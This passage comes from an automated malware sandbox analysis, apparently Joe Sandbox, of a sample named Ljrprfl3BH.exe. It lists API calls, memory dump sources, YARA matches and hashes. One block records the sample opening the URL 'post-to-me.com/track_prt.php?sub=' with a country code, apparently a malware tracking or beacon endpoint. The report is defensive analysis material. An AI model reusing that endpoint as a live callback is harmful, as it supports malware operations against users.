                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 021AB156
                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 021AB188
                                                                            • List.LIBCMT ref: 021AB20B
                                                                            • List.LIBCMT ref: 021AB21A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                            • String ID:
                                                                            • API String ID: 3281396844-0
                                                                            • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                            • Instruction ID: 5b4c441d70587190665ad18e7860838805b3aa69eae684705f3f2719fc070169
                                                                            • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                            • Instruction Fuzzy Hash: 25318D7AD89696DFCB14EFA4D6A06EDBBB2BF24308F05006EC44577241CB316A14CF90
                                                                            APIs
                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                            • String ID:
                                                                            • API String ID: 2357751836-0
                                                                            • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                            • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                            • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                            • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                            APIs
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02195099
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021950AD
                                                                              • Part of subcall function 0219BDA4: __EH_prolog3_GS.LIBCMT ref: 0219BDAB
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02195112
                                                                            • __Getcoll.LIBCPMT ref: 02195121
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02195131
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 1844465188-0
                                                                            • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                            • Instruction ID: badfa103fda3dc4b4a5ab1b658e93d24a54bd78258ddf99d861c1a59483eacbf
                                                                            • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                            • Instruction Fuzzy Hash: 32217971890308EFDF11EFA4D45479DBBB2BF54711F50852AD085AB281DB749A44CF91
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                            • _free.LIBCMT ref: 00431F88
                                                                            • _free.LIBCMT ref: 00431FAF
                                                                            • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                            • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                            • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                            • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                            • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                            APIs
                                                                            • GetLastError.KERNEL32(0219DACD,0219DACD,00000002,021BED25,021C3941,00000000,?,021B69F5,00000002,00000000,00000000,00000000,?,0219CF7E,0219DACD,00000004), ref: 021C21BA
                                                                            • _free.LIBCMT ref: 021C21EF
                                                                            • _free.LIBCMT ref: 021C2216
                                                                            • SetLastError.KERNEL32(00000000,?,0219DACD), ref: 021C2223
                                                                            • SetLastError.KERNEL32(00000000,?,0219DACD), ref: 021C222C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                            • Instruction ID: c04fc9009335a3d42ccbde5abccb72d542b882736628a7b8bafe3d9b9044dcf9
                                                                            • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                            • Instruction Fuzzy Hash: 8A01443E5C56007FC31637246C88E2B266EFBF2B72B71012CFC25A2290EFB189018469
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                            • _free.LIBCMT ref: 00431F01
                                                                            • _free.LIBCMT ref: 00431F29
                                                                            • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                            • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                            • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                            • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                            • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                            • _free.LIBCMT ref: 021C2168
                                                                            • _free.LIBCMT ref: 021C2190
                                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C219D
                                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                            • Instruction ID: 6cad3f5eae999d5b648cf44d00dafe1d8c53dd72d966c7287b76fbddf45fbca6
                                                                            • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                            • Instruction Fuzzy Hash: E1F0A43E5C57007FD2163724BC09B5B266A9FE2B63F76012CFE14A23D0EF718506856A
                                                                            APIs
                                                                              • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                              • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                              • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                              • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                              • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                            • String ID:
                                                                            • API String ID: 4266703842-0
                                                                            • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                            • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                            • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                            • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                            APIs
                                                                              • Part of subcall function 021A2994: TlsGetValue.KERNEL32(?,?,021A0DB2,021A2EBF,00000000,?,021A0D90,?,?,?,00000000,?,00000000), ref: 021A299A
                                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 021A7BA1
                                                                              • Part of subcall function 021B120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 021B1231
                                                                              • Part of subcall function 021B120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 021B124A
                                                                              • Part of subcall function 021B120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021B12C0
                                                                              • Part of subcall function 021B120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021B12C8
                                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 021A7BAF
                                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 021A7BB9
                                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 021A7BC3
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A7BE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                            • String ID:
                                                                            • API String ID: 4266703842-0
                                                                            • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                            • Instruction ID: ba0a401c90a84145a523276d1977da73c511f0c1df16e7bb2b55b58a5b33251c
                                                                            • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                            • Instruction Fuzzy Hash: E2F02B79A402186FCF26B7B5983096DF72B9F90B25F00412AD81153290DF359B468FC1
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00439E4D
                                                                              • Part of subcall function 0043345A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                              • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                            • _free.LIBCMT ref: 00439E5F
                                                                            • _free.LIBCMT ref: 00439E71
                                                                            • _free.LIBCMT ref: 00439E83
                                                                            • _free.LIBCMT ref: 00439E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                            • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                            • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                            APIs
                                                                            • _free.LIBCMT ref: 021CA0B4
                                                                              • Part of subcall function 021C36C1: HeapFree.KERNEL32(00000000,00000000,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?), ref: 021C36D7
                                                                              • Part of subcall function 021C36C1: GetLastError.KERNEL32(?,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?,?), ref: 021C36E9
                                                                            • _free.LIBCMT ref: 021CA0C6
                                                                            • _free.LIBCMT ref: 021CA0D8
                                                                            • _free.LIBCMT ref: 021CA0EA
                                                                            • _free.LIBCMT ref: 021CA0FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                            • Instruction ID: 22d88e3263dfe1f6ee20978a3c9a6f83789ad71907bf3a95cba16757c8b0cb84
                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                            • Instruction Fuzzy Hash: E6F09636985314AB8721FF58F8C2C0A77DAAE14364774494DF018D7721CB31FCA08AD9
                                                                            APIs
                                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                            • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                            • String ID:
                                                                            • API String ID: 2583373041-0
                                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                            • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                            • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                            APIs
                                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 021ACF26
                                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 021ACF57
                                                                            • GetCurrentThread.KERNEL32 ref: 021ACF60
                                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 021ACF73
                                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 021ACF7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                            • String ID:
                                                                            • API String ID: 2583373041-0
                                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                            • Instruction ID: 8123f9cf460c2c382f0dcf90408c905bcab5b202811da1f59d64652c374f6a2a
                                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                            • Instruction Fuzzy Hash: CCF0A73E280A009FCA29EF60F5709BB73769FC4610300055DE59746560CF31A907DB61
                                                                            APIs
                                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02192E84
                                                                              • Part of subcall function 02191321: _wcslen.LIBCMT ref: 02191328
                                                                              • Part of subcall function 02191321: _wcslen.LIBCMT ref: 02191344
                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02193097
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen_wcslen
                                                                            • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                            • API String ID: 3381584094-4083784958
                                                                            • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                            • Instruction ID: fcc1b96aca4d4c38b12768ceefe1f1f819c9b2245ea8458bb8c66c0ec3082d2d
                                                                            • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                            • Instruction Fuzzy Hash: 805174A5A65344A9E720EFB0BC41B7633B8FF54712F10543AE528CB2B2E7B1D944871E
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: BC$BC
                                                                            • API String ID: 885266447-2490606219
                                                                            • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                            • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                            • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                            • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ljrprfl3BH.exe,00000104), ref: 0042F743
                                                                            • _free.LIBCMT ref: 0042F80E
                                                                            • _free.LIBCMT ref: 0042F818
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                            • API String ID: 2506810119-4288729413
                                                                            • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                            • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                            • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                            • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ljrprfl3BH.exe,00000104), ref: 021BF9AA
                                                                            • _free.LIBCMT ref: 021BFA75
                                                                            • _free.LIBCMT ref: 021BFA7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                            • API String ID: 2506810119-4288729413
                                                                            • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                            • Instruction ID: 9452585da6ca3c2f3e4fb8f70d0e34b0023789ac7040bea6ec0274785f20fbb0
                                                                            • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                            • Instruction Fuzzy Hash: D9317571A80258EFDB26DFA9DC84DDEBBFDEF8A710B104066F80597221D7709A41CB90
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                              • Part of subcall function 0043921A: _free.LIBCMT ref: 00439280
                                                                              • Part of subcall function 00438E8F: GetOEMCP.KERNEL32(00000000), ref: 00438EBA
                                                                            • _free.LIBCMT ref: 00439173
                                                                            • _free.LIBCMT ref: 004391A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorLast
                                                                            • String ID: u$u
                                                                            • API String ID: 3291180501-388375793
                                                                            • Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                            • Instruction ID: 9b14abf3bf2fe7e14eb2dcc81dfa465f84d4fb680b36cf54f8426df5d89ca735
                                                                            • Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                            • Instruction Fuzzy Hash: AD31F531904209AFEF10EFA9D445A6AB7F1EF48325F20119FE404AB3A1DB7A9D41CB48
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                              • Part of subcall function 021C9481: _free.LIBCMT ref: 021C94E7
                                                                              • Part of subcall function 021C90F6: GetOEMCP.KERNEL32(00000000), ref: 021C9121
                                                                            • _free.LIBCMT ref: 021C93DA
                                                                            • _free.LIBCMT ref: 021C9410
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorLast
                                                                            • String ID: u$u
                                                                            • API String ID: 3291180501-388375793
                                                                            • Opcode ID: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
                                                                            • Instruction ID: 5d8a35af608da2869db40594d1cb70d0c50aaec730f4a3de61e133550382cebe
                                                                            • Opcode Fuzzy Hash: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
                                                                            • Instruction Fuzzy Hash: F631E435944208AFDB10EBA9D580BAE77F5EF50320F31419ED9049B2A1EB719D41CF50
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0219C8D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Exception@8Throw
                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                            • API String ID: 2005118841-1866435925
                                                                            • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                            • Instruction ID: 4b382c1d7bb442def3ef8ab456455e3659a972d49d3f7fcc25ac07e7841f5bab
                                                                            • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                            • Instruction Fuzzy Hash: B5F02B73C806086FCF04EB54CD01BEA33985B09745F048077EE956A082E7699905CBE5
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                            • ExitThread.KERNEL32 ref: 0042DFCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
